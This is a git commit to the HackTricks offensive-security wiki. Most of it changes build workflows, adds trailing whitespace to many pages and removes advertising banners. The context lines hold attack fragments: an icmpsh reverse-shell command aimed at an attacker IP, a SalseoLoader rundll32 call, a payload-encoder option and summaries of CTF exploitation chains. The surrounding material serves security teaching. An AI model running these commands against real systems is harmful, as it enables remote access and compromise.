translations 4

This commit is contained in:
Carlos Polop 2025-01-02 21:57:43 +01:00
parent fbf2a0779e
commit 61aa4fc5ee
251 changed files with 473 additions and 783 deletions

View File

@ -47,7 +47,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=en mdbook build
# Cat hacktricks-preprocessor.log
#- name: Cat hacktricks-preprocessor.log

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -105,7 +105,7 @@ jobs:
# Build the mdBook
- name: Build mdBook
run: mdbook build
run: MDBOOK_BOOK__LANGUAGE=$BRANCH mdbook build
# Login in AWs
- name: Configure AWS credentials using OIDC

View File

@ -29,3 +29,5 @@ icmpsh.exe -t <Attacker-IP> -d 500 -b 30 -s 128
```
{{#include ../banners/hacktricks-training.md}}

View File

@ -176,3 +176,5 @@ rundll32.exe SalseoLoader.dll,main
```
{{#include ../banners/hacktricks-training.md}}

View File

@ -11,3 +11,5 @@
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

View File

@ -1,3 +1,5 @@
# Arbitrary Write 2 Exec

View File

@ -70,3 +70,5 @@ Now a **fast bin attack** is performed:
- [https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md).
{{#include ../../banners/hacktricks-training.md}}

View File

@ -87,3 +87,5 @@ The **Full RELRO** protection is meant to protect agains this kind of technique
- [https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook](https://ir0nstone.gitbook.io/notes/types/stack/one-gadgets-and-malloc-hook)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -54,3 +54,5 @@ In order to abuse **`.fini_array`** to get an eternal loop you can [**check what
> In newer versions, even with [**Partial RELRO**] the section **`.fini_array`** is made **read-only** also.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -236,3 +236,5 @@ To abuse this you need either to **leak or erase the `PTR_MANGLE`cookie** and th
You can find an example of this in the [**original blog post about the technique**](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#6---code-execution-via-other-mangled-pointers-in-initial-structure).
{{#include ../../banners/hacktricks-training.md}}

View File

@ -16,3 +16,5 @@ However he you can find some nice **examples**:
- 64bits, no relro, canary, nx, no pie. There is an off-by-one in an array in the stack that allows to control a pointer granting WWW (it write the sum of all the numbers of the array in the overwritten address by the of-by-one in the array). The stack is controlled so the GOT `exit` address is overwritten with `pop rdi; ret`, and in the stack is added the address to `main` (looping back to `main`). The a ROP chain to leak the address of put in the GOT using puts is used (`exit` will be called so it will call `pop rdi; ret` therefore executing this chain in the stack). Finally a new ROP chain executing ret2lib is used.
- [https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html](https://guyinatuxedo.github.io/14-ret_2_system/tu_guestbook/index.html)
- 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).

View File

@ -109,3 +109,5 @@ Something to take into account is that usually **just one exploitation of a vuln
- [**Uninitialized variables**](../stack-overflow/uninitialized-variables.md): You never know
{{#include ../../banners/hacktricks-training.md}}

View File

@ -394,3 +394,5 @@ Each variable will hace an entry in the TLS header specifying the size and the T
The `__TLS_MODULE_BASE` is a symbol used to refer to the base address of the thread local storage and points to the area in memory that contains all the thread-local data of a module.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -239,3 +239,5 @@ Then, configure the debugger: Debugger (linux remote) --> Proccess options...:
![](<../../../images/image (858).png>)
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -174,3 +174,5 @@ pwn update
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -33,3 +33,5 @@ gdb /path/to/executable /path/to/core_file
This command loads the executable and the core file into GDB, allowing you to inspect the state of the program at the time of the crash. You can use GDB commands to explore the stack, examine variables, and understand the cause of the crash.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -302,3 +302,5 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -80,3 +80,5 @@ p.interactive()
- 64 bits, ASLR enabled, no canary, stack overflow in main from a child function. ROP gadget to call puts to leak the address of puts from the GOT and then call an one gadget.
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -31,3 +31,5 @@ Following [**this link**](https://github.com/florianhofhammer/stack-buffer-overf
- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md)
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -23,3 +23,5 @@ The **shadow stack** is a **dedicated stack used solely for storing return addre
- The **shadow stack**, on the other hand, ensures that even if an attacker can overwrite a return address on the normal stack, the **discrepancy will be detected** when comparing the corrupted address with the secure copy stored in the shadow stack upon returning from a function. If the addresses don't match, the program can terminate or take other security measures, preventing the attack from succeeding.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -82,3 +82,5 @@ Pointer guard is an exploit mitigation technique used in glibc to protect stored
- [https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1](https://blog.infosectcbr.com.au/2020/04/bypassing-pointer-guard-in-linuxs-glibc.html?m=1)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -82,3 +82,5 @@ When a **mismatch is detected** the kernel will **panic** to prevent further exp
- [https://www.youtube.com/watch?v=UwMt0e_dC_Q](https://www.youtube.com/watch?v=UwMt0e_dC_Q)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -14,3 +14,5 @@ The **No-Execute (NX)** bit, also known as **Execute Disable (XD)** in Intel ter
- **Ret2...**
{{#include ../../banners/hacktricks-training.md}}

View File

@ -30,3 +30,5 @@ bypassing-canary-and-pie.md
- [https://ir0nstone.gitbook.io/notes/types/stack/pie](https://ir0nstone.gitbook.io/notes/types/stack/pie)
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -94,3 +94,5 @@ According to [**some observation from this post**](https://github.com/florianhof
According to that blog post it's recommended to add a short delay between requests to the server is introduced.
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -33,3 +33,5 @@ If Full RELRO is enabled, the only way to bypass it is to find another way that
Note that **LIBC's GOT is usually Partial RELRO**, so it can be modified with an arbitrary write. More information in [Targetting libc GOT entries](https://github.com/nobodyisnobody/docs/blob/main/code.execution.on.last.libc/README.md#1---targetting-libc-got-entries)**.**
{{#include ../../banners/hacktricks-training.md}}

View File

@ -74,3 +74,5 @@ This attack is performed in the writeup: [https://7rocky.github.io/en/ctf/other/
- [https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/](https://7rocky.github.io/en/ctf/other/securinets-ctf/scrambler/)
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -119,3 +119,5 @@ Check also the presentation of [https://www.slideshare.net/codeblue_jp/master-ca
- [https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html](https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html)
- 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.

View File

@ -31,3 +31,5 @@ With an **arbitrary read** like the one provided by format **strings** it might
- This challenge abuses in a very simple way a format string to read the canary from the stack
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -36,3 +36,5 @@ In order to bypass this the **escape character `\x16` must be prepended to any `
**Here you can** [**find an example of this behaviour**](https://ir0nstone.gitbook.io/hackthebox/challenges/pwn/dream-diary-chapter-1/unlink-exploit)**.**
{{#include ../banners/hacktricks-training.md}}

View File

@ -2,11 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
{% embed url="https://www.stmcyber.com/careers" %}
## Basic Information
@ -242,10 +237,7 @@ It's possible to abuse the write actions of a format string vulnerability to **w
- [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
- 32 bit, relro, no canary, nx, no pie, format string to write an address inside main in `.fini_array` (so the flow loops back 1 more time) and write the address to `system` in the GOT table pointing to `strlen`. When the flow goes back to main, `strlen` is executed with user input and pointing to `system`, it will execute the passed commands.
<figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
{% embed url="https://www.stmcyber.com/careers" %}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -182,3 +182,5 @@ p.close()
<figure><img src="broken-reference" alt="" width="563"><figcaption></figcaption></figure>
{{#include ../../banners/hacktricks-training.md}}

View File

@ -143,3 +143,5 @@ P.interactive()
```
{{#include ../../banners/hacktricks-training.md}}

View File

@ -121,3 +121,5 @@ In this example, if a user inputs a negative number, it will be interpreted as a
This **doesn't change in ARM64** as you can see in [**this blog post**](https://8ksec.io/arm64-reversing-and-exploitation-part-8-exploiting-an-integer-overflow-vulnerability/).
{{#include ../banners/hacktricks-training.md}}

View File

@ -210,3 +210,5 @@ void iosurface_kwrite64(uint64_t addr, uint64_t value) {
With these primitives, the exploit provides controlled **32-bit reads** and **64-bit writes** to kernel memory. Further jailbreak steps could involve more stable read/write primitives, which may require bypassing additional protections (e.g., PPL on newer arm64e devices).

View File

@ -527,3 +527,5 @@ heap-memory-functions/heap-functions-security-checks.md
- [https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/](https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/)
- [https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/](https://azeria-labs.com/heap-exploitation-part-2-glibc-heap-free-bins/)

View File

@ -638,3 +638,5 @@ heap-memory-functions/heap-functions-security-checks.md
- [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/implementation/tcache/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -130,3 +130,5 @@ h1: 0xaaab0f0c2380
- [https://heap-exploitation.dhavalkapil.com/attacks/double_free](https://heap-exploitation.dhavalkapil.com/attacks/double_free)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -151,3 +151,5 @@ unsorted-bin-attack.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -5,3 +5,5 @@
##
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -384,3 +384,5 @@ _int_free_merge_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size)
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -161,3 +161,5 @@ free.md
- Error message: `realloc(): invalid next size`
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -1744,3 +1744,5 @@ sysmalloc_mmap (INTERNAL_SIZE_T nb, size_t pagesize, int extra_flags, mstate av)
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -81,3 +81,5 @@ Heap leaks:
- If P is in the doubly linked list, both `fd` and `bk` will be pointing to an available chunk in the heap
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -48,3 +48,5 @@ python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
- We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -47,3 +47,5 @@
- Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -62,3 +62,5 @@ Then, do another malloc to get a chunk at the target address.
- Then, House of force was used (abusing the UAF) to overwrite the size of the left space with a -1, allocate a chunk big enough to get tot he free hook, and then allocate another chunk which will contain the free hook. Then, write in the hook the address of `system`, write in a chunk `"/bin/sh"` and finally free the chunk with that string content.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -45,3 +45,5 @@ Then you will be able to allocate `fake0`.
- [https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html](https://guyinatuxedo.github.io/40-house_of_lore/house_lore_exp/index.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -73,3 +73,5 @@ This approach exploits heap management mechanisms, libc information leaks, and h
- [https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html](https://guyinatuxedo.github.io/43-house_of_orange/house_orange_exp/index.html)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -109,3 +109,5 @@ The fake chunk becomes part of the fastbin list, making it a legitimate chunk fo
The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -116,3 +116,5 @@ Finally, one the correct address is overwritten, **call `malloc` and trigger the
- [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_roman/)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -116,3 +116,5 @@ int main() {
- [https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -56,3 +56,5 @@ You can find another great explanation of this attack in [**guyinatuxedo**](http
- FSOP is needed to finish the exploit.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -113,3 +113,5 @@ This image explains perfectly the attack:
- Finally, a new fast bin chunk of 0x68 is allocated and `__malloc_hook` is overwritten with a `one_gadget` address
{{#include ../../banners/hacktricks-training.md}}

View File

@ -21,3 +21,5 @@ It might be possible to **overflow an allocated chunk having next a freed chunk*
In this case it would be possible to **modify the size** of the following chunk in memory. An attacker could abuse this to **make an allocated chunk have a bigger size**, then **`free`** it, making the chunk been **added to a bin of a different** size (bigger), then allocate the **fake size**, and the attack will have access to a **chunk with a size which is bigger** than it really is, **granting therefore an overlapping chunks situation**, which is exploitable the same way to a **heap overflow** (check previous section).
{{#include ../../banners/hacktricks-training.md}}

View File

@ -45,3 +45,5 @@ Usually it's possible to find at the beginning of the heap a chunk containing th
- **Tcache poisoning** to get an arbitrary write primitive.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -127,3 +127,5 @@ This attack allows to **change a pointer to a chunk to point 3 addresses before
- There is an overflow that allows to control the FD and BK pointers of custom malloc that will be (custom) freed. Moreover, the heap has the exec bit, so it's possible to leak a heap address and point a function from the GOT to a heap chunk with a shellcode to execute.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -71,3 +71,5 @@ Then C was deallocated, and consolidated with A+B (but B was still in used). A n
- Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -18,3 +18,5 @@ first-fit.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -62,3 +62,5 @@ d = malloc(20); // a
- It's possible to alloc some memory, write the desired value, free it, realloc it and as the previous data is still there, it will treated according the new expected struct in the chunk making possible to set the value ot get the flag.
- [**https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html**](https://guyinatuxedo.github.io/26-heap_grooming/swamp19_heapgolf/index.html)
- In this case it's needed to write 4 inside an specific chunk which is the first one being allocated (even after force freeing all of them). On each new allocated chunk it's number in the array index is stored. Then, allocate 4 chunks (+ the initialy allocated), the last one will have 4 inside of it, free them and force the reallocation of the first one, which will use the last chunk freed which is the one with 4 inside of it.

View File

@ -193,3 +193,5 @@ rop-syscall-execv/
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
{{#include ../../banners/hacktricks-training.md}}

View File

@ -122,3 +122,5 @@ Behaviour signatures to find those functions:
- [https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop](https://www.ctfrecipes.com/pwn/stack-exploitation/arbitrary-code-execution/code-reuse-attack/blind-return-oriented-programming-brop)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -182,3 +182,5 @@ target.interactive()
Usually these cases are also vulnerable to [**ret2plt**](../common-binary-protections-and-bypasses/aslr/ret2plt.md) + [**ret2lib**](ret2lib/), but sometimes you need to control more parameters than are easily controlled with the gadgets you find directly in libc. For example, the `write()` function requires three parameters, and **finding gadgets to set all these directly might not be possible**.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -195,3 +195,5 @@ target.interactive()
- 32bit, no relro, no canary, nx, no pie, basic small buffer overflow and return. To exploit it the bof is used to call `read` again with a `.bss` section and a bigger size, to store in there the `dlresolve` fake tables to load `system`, return to main and re-abuse the initial bof to call dlresolve and then `system('/bin/sh')`.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -187,3 +187,5 @@ p.interactive()
- [https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp](https://ir0nstone.gitbook.io/notes/types/stack/reliable-shellcode/using-rsp)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -163,3 +163,5 @@ This basically means abusing a **Ret2lib to transform it into a `printf` format
- 32 bit, no relro, no canary, nx, pie. Abuse a bad indexing to leak addresses of libc and heap from the stack. Abuse the buffer overflow o do a ret2lib calling `system('/bin/sh')` (the heap address is needed to bypass a check).
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -35,3 +35,5 @@ angry_gadget.py examples/libc6_2.23-0ubuntu10_amd64.so
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -215,3 +215,5 @@ p.interactive()
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -302,3 +302,5 @@ BINSH = next(libc.search("/bin/sh")) - 64
```
{{#include ../../../../banners/hacktricks-training.md}}

View File

@ -2,9 +2,6 @@
{{#include ../../../../banners/hacktricks-training.md}}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
```python:template.py
from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools
@ -222,8 +219,7 @@ Try to **subtract 64 bytes to the address of "/bin/sh"**:
BINSH = next(libc.search("/bin/sh")) - 64
```
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{{#include ../../../../banners/hacktricks-training.md}}

View File

@ -67,3 +67,5 @@ srop-sigreturn-oriented-programming/srop-arm64.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -193,3 +193,5 @@ target.interactive()
- 64 bits, no PIE, nx, BF canary, write in some memory a ROP to call `execve` and jump there.
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -126,3 +126,5 @@ p.interactive()
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -143,3 +143,5 @@ target.interactive()
- SROP is used to give execution privileges (memprotect) to the place where a shellcode was placed.
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -190,3 +190,5 @@ And to bypass the address of `/bin/sh` you could create several env variables po
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -102,3 +102,5 @@ There are several protections trying to prevent the exploitation of vulnerabilit
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -27,3 +27,5 @@ You can find an example in:
- [https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting](https://github.com/florianhofhammer/stack-buffer-overflow-internship/blob/master/NOTES.md#pointer-redirecting)
{{#include ../../banners/hacktricks-training.md}}

View File

@ -113,3 +113,5 @@ ret2win-arm64.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -187,3 +187,5 @@ p.close()
```
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -234,3 +234,5 @@ Also in the following page you can see the equivalent of **Ret2esp in ARM64**:
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

View File

@ -95,3 +95,5 @@ The **NOP slide** (`asm('nop')`) is used to increase the chance that execution w
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -79,3 +79,5 @@ The only "complicated" thing to find here would be the address in the stack to c
I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
{{#include ../../../banners/hacktricks-training.md}}

View File

@ -66,3 +66,5 @@ int main() {
This doesn't change at all in ARM64 as local variables are also managed in the stack, you can [**check this example**](https://8ksec.io/arm64-reversing-and-exploitation-part-6-exploiting-an-uninitialized-stack-variable-vulnerability/) were this is shown.
{{#include ../../banners/hacktricks-training.md}}

View File

@ -259,3 +259,5 @@ EXITFUNC=thread -e x86/shikata_ga_nai
```
{{#include ../banners/hacktricks-training.md}}

View File

@ -184,3 +184,5 @@ These practices and mechanisms are foundational for anyone looking to engage wit
- [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy#Forced_address_reuse)
{{#include ../../banners/hacktricks-training.md}}

Some files were not shown because too many files have changed in this diff Show More